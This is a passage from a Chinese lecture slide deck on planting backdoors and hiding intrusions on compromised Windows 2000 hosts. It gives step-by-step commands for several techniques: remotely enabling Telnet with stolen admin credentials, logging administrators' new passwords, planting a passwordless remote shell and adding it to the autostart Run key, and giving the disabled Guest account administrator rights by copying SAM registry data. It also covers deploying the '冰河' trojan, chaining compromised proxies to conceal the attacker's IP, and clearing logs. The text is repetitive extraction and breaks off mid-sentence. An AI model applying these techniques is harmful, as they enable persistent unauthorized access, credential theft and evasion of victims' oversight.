1、第第8 8講網絡后門與網絡隱身講網絡后門與網絡隱身內容提要內容提要一、建立網絡后門一、建立網絡后門為了保持對已經入侵的主機長久的控制，需要在主機上建立網絡后門，以后可以直接通過后門入侵系統。二、網絡隱身二、網絡隱身當入侵主機以后，通常入侵者的信息就被記錄在主機的日志中，比如IP地址、入侵的時間以及做了哪些破壞活動等等。為了入侵的痕跡被發現，需要隱藏或者清除入侵的痕跡三、實現隱身的方法三、實現隱身的方法n設置代理跳板n清除系統日志網絡后門網絡后門 是保持對目標主機長久控制的關鍵策略。可以通過建立服務端口建立服務端口和克隆管理員帳號克隆管理員帳號來實現。留后門的藝術：留后門的藝術：1、只要能不通過

2、正常登錄進入系統的途徑都稱之為網絡后門。后門的好壞取決于被管理員發現的概率。2、只要是不容易被發現的后門都是好后門。3、讓管理員看了感覺沒有任何特別的。例例1 遠程啟動遠程啟動Telnet服務服務l 利用主機的Telnet服務，有管理員密碼就可以登錄到對方的命令行，進而操作對方的文件系統。如果Telnet服務是關閉的，就不能登錄了。Win2K Server的Telnet默認是關閉的，可運行命令開啟本地Telnet服務。命令窗口輸入：命令窗口輸入：tlntadmn.exe第1步：開啟本地Telnet服務啟動本地啟動本地Telnet服務服務遠程開啟對方的遠程開啟對方的Telnet服務服務cscri

3、pt RTCS.vbe 09 administrator 123456 1 23其中：cscript是操作系統自帶的命令uRTCS.vbe是該工具軟件腳本文件uIP地址是要啟動Telnet的主機地址uadministrator是用戶名，123456是密碼u1是登錄驗證方式，23是Telnet開放的端口第2步：開啟對方Telnet服務遠程開啟對方的遠程開啟對方的Telnet服務服務登錄目標主機登錄目標主機Telnet服務服務輸入：Telnet 09因為Telnet的用戶名和密碼是明文傳遞的，會出現確認發送信息對話框等待確認。第3步：登錄目標主機Teln

4、et服務登錄登錄Telnet的用戶名和密碼的用戶名和密碼 l 輸入“y”后再要求輸入用戶名和密碼，將進入對方主機的命令行。例例2記錄管理員口令修改過程記錄管理員口令修改過程當入侵到對方主機并得到管理員口令以后，就可以對主機進行長久入侵了。但是一個好的管理員一般每隔半個月左右就會修改一次密碼，這樣已經得到的密碼就不起作用了。可用軟件Win2kPass.exe記錄修改的新密碼。它會將密碼記錄在Winnttemp目錄下的Config.ini文件中，有時候文件名可能不是Config，但是擴展名一定是ini，該工具軟件是有“自殺”的功能，就是當執行完畢后，自動刪除自己。記錄管理員口令修改過程記錄管理員口

5、令修改過程l 首先在對方系統中執行Win2KPass，當對方主機管理員密碼修改并重啟計算機以后，就在Winnttemp目錄下產生一個ini文件。通過獲取該文件可獲取新的密碼。例例3 建立建立Web服務和服務和Telnet服務服務 使用wnc.exe可以在對方的主機上開啟兩個服務：Web服務（端口是808 ）Telnet服務（端口是707 ）只要在對方的命令行下執行一下wnc.exe即可用netstat an查看開啟的端口測試測試Web服務服務 首先測試Web服務808端口，在瀏覽器地址欄中輸入09:80809:808若出現主機

6、的盤符列表，成功！看密碼修改記錄文件看密碼修改記錄文件 l 可以下載對方硬盤或光盤上的任意文件（對于漢字文件名的文件下載有問題）l 可到Winnt/temp下查看對方密碼修改記錄文件。利用利用telnet命令連接命令連接707端口端口 l telnet 09 707登錄到對方主機l 注意：不需要任何的用戶名和密碼，就可以登錄對方主機的命令行！呵呵，厲害！呵呵，厲害！將其設為自啟動程序將其設為自啟動程序1.通過707端口也可以方便的獲得對方的管理員權限。2.wnc功能強大，但是不能自動執行，需要將它加到自啟動程序列表中。3.一般將wnc.exe文件放到對方的winnt目錄或

7、者winnt/system32目錄下（由于它們都是系統環境目錄，執行其中的文件不需要給出具體的路徑）4.將wnc.exe和reg.exe拷貝對方的winnt目錄下。將將wnc加到自啟動列表加到自啟動列表 執行：reg.exe add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v service /d wnc.exe例例4 讓禁用的讓禁用的Guest具有管理權限具有管理權限 操作系統所有的用戶信息都保存在注冊表中，但是如果直接使用“regedit”命令打開注冊表，該鍵值是隱藏的。但可用psu.exe得到該鍵值的查看和編輯權將它拷貝對方主機的C盤

8、下，并在任務管理器查看對方主機winlogon.exe進程的ID號或者使用pulist.exe文件查看該進程的ID號。 psu -p regedit -i pid （此處pid為192 ）在執行該命令的時候必須將注冊表關閉，執行完命令以后，自動打開了注冊表編輯器，查看SAM下的鍵值。查看查看winlogon.exe的進程號的進程號 192查看查看SAM鍵值鍵值 在Win2K server中：Administrator為0 x1f4guest一般為0 x1f5拷貝管理員配置信息拷貝管理員配置信息 l 根據“0 x1f4”和“0 x1f5”找到Administrator和guest帳戶的配置信息。

9、l 雙擊“000001F4”目錄下鍵值“F”，可以看到該鍵值的二進制信息，將這些二進制信息全選，并拷貝到出來。l 將拷貝出來的信息全部覆蓋到“000001F5”目錄下的“F”鍵值中保存鍵值保存鍵值 l Guest帳戶已經具有管理員權限了。為使它能在禁用狀態登錄，下一步將Guest帳戶信息導出注冊表。l 選擇User目錄，選擇菜單欄“注冊表”下 “導出注冊表文件”，將該鍵值保存為一個配置文件。刪除刪除Guest帳戶信息帳戶信息 l 打開“計算機管理”對話框，刪除Guest帳戶l 打開注冊表，刪除“00001F5”兩個目錄。l 刷新對方主機的用戶列表，出現用戶找不到的對話框修改修改Guest帳戶的

10、屬性帳戶的屬性 l 然后再將剛才導出的信息文件，再導入注冊表。再刷新用戶列表就不會出錯了。l 在對方主機的命令行下命令行下修改Guest的用戶屬性。l 首先修改Guest帳戶的密碼，并將Guest帳戶開啟和停止.c:net user guest 123456c:net user guest /active:yesc:net user guest /active:no利用禁用的利用禁用的guest帳戶登錄帳戶登錄 l 查看Guest帳戶，發現該帳戶使禁用的，但卻能登錄l 注銷退出系統，然后用用戶名：“guest”，密碼：“123456”登錄系統，一定成功！連接終端服務的軟件連接終端服務的軟件 l

11、 終端服務是Windows系統自帶的，可以遠程通過圖形界面操縱服務器。默認情況下終端服務的端口是3389。可以在系統服務中查看終端服務是否啟動。l netstat an來查看該端口是否開放連接到終端服務連接到終端服務 l 管理員為了遠程操作方便，該服務一般都是開啟的。黑客同樣可以遠程圖形化界面來操作該主機！l 目前有三種常用方法連接到對方主機：n 使用Win2K的遠程桌面連接工具。n 使用WinXP的遠程桌面連接工具。n 使用基于瀏覽器方式的連接工具。例例5 5 三種方法連接到終端服務三種方法連接到終端服務 l 第一種：利用Win2K自帶的終端服務工具：mstsc.exe。只需設置要連接主機的

12、IP和連接桌面的分辨率就可以。終端服務終端服務如果目標主機的終端服務是啟動的，可以直接登錄到對方的桌面，在登錄框輸入用戶名和密碼就可以在圖形化界面種操縱對方主機了。終端服務終端服務l 第二種：使用Win XP自帶的終端服務連接器：mstsc.exe。只要輸入對方的IP就可以。Web方式連接方式連接l 第三種：使用Web方式連接。該工具包含幾個文件，需要將這些文件配置到IIS的站點中去。配置配置Web站點站點 l 將這些文件拷貝到本地本地IISIIS默認Web站點的根目錄在瀏覽器中連接終端服務在瀏覽器中連接終端服務 l 在瀏覽器中輸入：http:/localhostl 輸入對方的IP并選擇連接窗

13、口的分辨率，可登錄例例6 安裝并啟動終端服務安裝并啟動終端服務l 假設對方不僅沒有開啟終端服務，而且沒有安裝終端服務所需要的軟件。l 使用工具軟件djxyxs.exe，可以給對方安裝并開啟該服務。在該工具軟件中已經包含了安裝終端服務所需要的所有文件。l 將該文件上傳并拷貝到對方服務器的Winnttemp目錄下（必須放置在該目錄下，否則安裝不成功！）。1.執行djxyxs.exe，會自動進行解壓將文件全部放置到當前的目錄下；2.在當前目錄下執行解壓出來的程序azzd.exe，將自動在對方服務器上安裝并啟動終端服務。3.完成后服務器會重啟，之后可用終端服務連接軟件登錄到對方服務器了。例例6 安裝并

14、啟動終端服務安裝并啟動終端服務木馬木馬l 木馬是一種可以駐留在對方系統中的一種程序。l 木馬一般由兩部分組成：服務器端和客戶端。l 駐留在對方服務器的稱之為木馬的服務器端，遠程的可以連到木馬服務器的程序稱之為客戶端。l 木馬的功能是通過客戶端可以操縱服務器，進而操縱對方的主機。l 木馬程序在表面上看上去沒有任何的損害，實際上隱藏著可以控制用戶整個計算機系統、打開后門等危害系統安全的功能。常見木馬的使用常見木馬的使用l 常見的簡單木馬有：1、NetBus遠程控制2、冰河3、PCAnyWhere遠程控制“冰河”包含兩個程序文件： 服務器端(win32.exe) 客戶端(Y_Client.exe)例

15、例7 7 使用使用“冰河冰河”進行遠程控制進行遠程控制l 將win32.exe在遠程計算機上執行以后，通過Y_Client.exe文件來控制遠程得服務器。選擇配置菜單選擇配置菜單 l 將服務器程序種到對方主機之前需對服務器程序做一些設置：比如連接端口，連接密碼等。選擇菜單欄“設置”下的菜單項“配置服務器程序”。設置設置“冰河冰河”服務器配置服務器配置 查看注冊表查看注冊表 l 點擊按鈕“確定”以后，就將“冰河”的服務器種到某一臺主機上了。執行完win32.exe文件以后，系統沒有任何反應，其實已經更改了注冊表，并將服務器端程序和文本文件進行了關聯，當用戶雙擊一個擴展名為txt的文件的時候，就會

16、自動執行冰河服務器端程序。l沒有中冰河時，該注冊表項應該是使用notepad.exe文件來打開txt文件，中冰河后是用SYSEXPLR.EXE來打開txt文件，其實它就是“冰河”的服務器端程序！使用冰河客戶端添加主機使用冰河客戶端添加主機 l 目標主機中了冰河了，可以利用客戶端程序來連接服務器端程序。在客戶端添加主機的IP及密碼。查看對方的目錄列表查看對方的目錄列表 查看并控制遠程屏幕的菜單查看并控制遠程屏幕的菜單 l 可以在對方計算機上進行任意的操作，除此以外還可以查看并控制對方的屏幕等等。網絡代理跳板網絡代理跳板 l 當從本地入侵其他主機的時候，自己的IP會暴露給對方。通過將某一臺主機設置

17、為代理，通過該主機再入侵其他主機，這樣就會留下代理的IP地址，這樣就可以有效的保護自己的安全。二級代理的基本結構圖。代理服務器一本地計算機代理服務器二被入侵的主機l 本地通過兩級代理入侵某一臺主機，這樣在被入侵的主機上，就不會留下的自己的信息。可以選擇更多的代理級別，但考慮到網絡帶寬的問題，一般選擇兩到三級較合適。l 選擇代理服務的原則是選擇不同地區的主機作為代理。l 可以選擇做代理的主機有一個先決條件，必須先安裝相關的代理軟件，一般都是將已經被入侵的主機作為代理服務器。 網絡代理跳板網絡代理跳板 網絡代理跳板工具的使用網絡代理跳板工具的使用 l Snake是比較常用而且功能比較強大的代理工具

18、。l Snake的代理跳板，支持TCP/UDP代理，支持多個（最多達到255）跳板。l 程序文件為：SkSockServer.exe，代理方式為Sock5，并自動打開默認端口1813監聽。使用使用Snake代理跳板代理跳板 l 使用Snake代理跳板需要首先在每一級跳板主機上安裝Snake代理服務器。程序文件是SkSockServer.exe，將該文件拷貝到目標主機上。l 一般首先將本地計算機設置為一級代理，將文件拷貝到C盤根目錄下，然后將代理服務安裝到主機上。Sksockserver的配置的配置1 1：sksockserver install將代理服務安裝在主機中2 2：sksockserv

19、er -config port 1122將代理服務的端口設置為1122（也可為其他數值）3 3：sksockserver -config starttype 2 將該服務的啟動方式設置為自動啟動4 4：net start skserver 啟動代理服務 后用“netstat -an” 查看1122端口是否開放代理級別配置工具代理級別配置工具 l 本地設置完畢以后，在網絡上其他的主機上設置二級代理（如在09的主機上，類同）l 使用本地代理配置工具：SkServerGUI.exel “配置”-“經過的SKServer”，設置代理的順序，第一級代理是本地的1122端口，IP地址

20、是，第二級代理是09，端口是1122端口，注意將復選框“允許”選中。設置經過的代理服務器設置經過的代理服務器 設置可以訪問代理的客戶端設置可以訪問代理的客戶端 之后在命令下“啟動”該代理跳板安裝程序和漢化補丁安裝程序和漢化補丁 l 該程序啟動以后監聽的端口是“1913”。下面需要安裝代理的客戶端程序，該程序包含兩個程序，一個是安裝程序，一個漢化補丁（如果不安裝補丁程序將不能使用）。設置設置Socks代理代理 l 安裝sc32r231+SC32231-Ronnier后進行配置。設置需要代理的應用程序設置需要代理的應用程序 l 添加需要代理的應用程序，點擊工

21、具欄圖標“新建”，比如現在添加Internet Explore添加進來。運行IEIE中連接中連接0909查看使用代理的情況查看使用代理的情況 l 在IE的連接過程中，查看代理跳板的對話框，可以看到連接的信息。這些信息在一次連接會話完畢后會自動消失，必須在連接的過程中查看清除日志清除日志 l 清除日志是黑客入侵的最后的一步，黑客能做到來無蹤去無影，這一步起到決定性的作用。 清除清除IIS日志日志清除主機日志清除主機日志清除清除IIS日志日志l 當用戶訪問某個IIS服務器以后，無論是正常的訪問還是非正常的訪問，IIS都會記錄訪問者的IP地址以及訪問時間等信息。這些信息記錄在WinntSystem32logFiles目錄下。 IIS日志的格式日志的格式 l IIS日志記錄了用戶訪問的服務器文件、用戶登錄時間、用戶的IP、用戶瀏覽器、操作系統的版本號。清除清除I